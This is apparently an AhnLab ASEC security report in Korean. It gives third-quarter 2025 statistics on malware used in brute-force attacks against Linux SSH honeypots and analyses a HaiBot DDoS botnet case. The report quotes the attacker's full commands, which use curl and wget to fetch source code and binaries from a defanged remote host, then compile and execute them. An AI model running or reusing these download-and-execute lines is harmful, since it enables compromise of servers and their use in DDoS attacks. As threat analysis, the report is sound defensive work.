2025년 3분기 리눅스 SSH 서버 대상 악성코드 통계 보고서
AhnLab SEcurity intelligence Center(ASEC)에서는 허니팟을 활용하여 부적절하게 관리되고 있는 리눅스 SSH 서버를 대상으로 하는 무차별 대입 공격 또는 사전 공격들에 대한 대응 및 분류를 진행하고 있다. 본 문서에서는 2025년 3분기에 확인된 로그를 기반으로 공격에 사용된 공격지들의 현황과 해당 공격지(Attack Source)들에서 수행한 공격들에 대한 통계를 다룬다. 그리고 각각의 공격에 사용된 악성코드들을 분류하여 세부적인 통계를 정리한다.
1. 리눅스 SSH 서버 대상 공격 현황
다음은 2025년 3분기에 자사 허니팟 로그를 통해 확인된 리눅스 SSH 서버 대상 공격에 대한 통계이다.
[그림 1] 2025년 3분기 리눅스 SSH 서버 대상 공격 현황
공격에 사용된 악성코드 유형 대부분은 Worm, 코인 마이너 또는 DDoS 봇이며 이외에도 백도어나 기타 유형들이 존재한다. 비록 SSH 서비스가 설치된 서버를 대상으로하지만 기본적으로 IoT 장비를 대상으로 하는 IoT DDoS Bot 악성코드들이 함께 확인되는 것이 특징이다. 대표적으로 Mirai나 Gafgyt가 있으며 이외에도 Tsunami는 IoT 장비뿐만 아니라 리눅스 서버를 대상으로 유포되기도 한다. 리눅스 서버 대상 DDoS 악성코드로는 Tsunami 외에도 ShellBot이나 XorDDoS가 있다. CoinMiner 유형들로는 XMRig를 설치하는 다양한 사례들이 존재하지만 이외에도 Prometei나 P2PInfect가 있다.
2. 2025년 3분기 공격 사례
2025년 3분기에는 직접 소스 코드를 빌드해 사용하는 HaiBot 공격 사례가 확인되었다. C&C 서버에 다음과 같이 올바른 매개 변수를 입력하라는 의미의 문자열이 베트남어로 포함된 것을 보면 악성코드 제작자는 베트남어 사용자인 것으로 추정된다. [1]
[그림 2] C&C 서버에 설정된 베트남어 메시지
공격자는 허니팟 리눅스 서버에 로그인을 시도하였으며 성공한 이후에는 다음과 같은 유형의 명령을 실행하였다.
# ( curl -sSL -o build.c “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” && gcc -o build build.c -lcurl && chmod +x build && ./build) || (curl -sSL -o build “hxxp://api.haitool[.]xyz:25614/files?file_name=build” && chmod +x build && ./build); sleep 10
# sh -c ‘curl -s “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” -o build.c 2>/dev/null || wget -qO build.c “hxxp://api.haitool[.]xyz:25614/files?file_name=build.c” && gcc -o build build.c -lcurl 2>/dev/null && chmod +x build && ./build || (curl -s “hxxp://api.haitool[.]xyz:25614/files?file_name=build” -o build 2>/dev/null || wget -qO build “hxxp://api.haitool[.]xyz:25614/files?file_name=build”) && chmod +x build && ./build; sleep 10”
해당 명령은 다운로드 서버에서 “build.c” 파일을 다운로드하고 gcc를 이용해 직접 빌드한 후 실행하는 명령이다. 직접 빌드한 “build”는 다운로더이다. 다음과 같이 Bot과 DDoS 도구를 다운로드해 빌드한 후 실행하는 기능을 담당한다. “ddos”라는 이름으로 제작된 악성코드는 DDoS 공격을 수행할 수 있는 커맨드 라인 도구이다. Bot은 C&C 서버로부터 DDoS 명령을 전달받을 경우 인자와 함께 DDoS 도구를 실행해 DDoS 공격을 수행할 수 있다.
[그림 3] DDoS 도구의 명령 인자
DDoS 도구는 UDP Flood 공격만 지원하며 DDoS 패킷 전송 시 NULL이나 사이즈만큼의 문자열 “A” 또는 랜덤한 문자열들을 전송할 수 있다.
“bot_net”이라는 이를으로 빌드된 Bot은 C&C 서버에 접속한 후 주기적으로 공격 대상에 대한 명령을 전달받을 수 있다. 명령에 피해자의 IP 및 Port 주소가 포함될 경우 DDoS 도구를 인자와 함께 실행하여 피해자 시스템에 DDoS 공격을 수행할 수 있다. C&C 서버와의 통신은 다음과 같이 진행되는데 최초 실행 시 “status”를 “report”로 설정하여 전송하며 이후 주기적으로 “check”를 전송하여 그 응답으로 공격 대상을 전달받는다. 현재 기준 공격 대상에 대한 명령은 아직 확인되지 않는다.
[그림 4] C&C 서버와의 통신
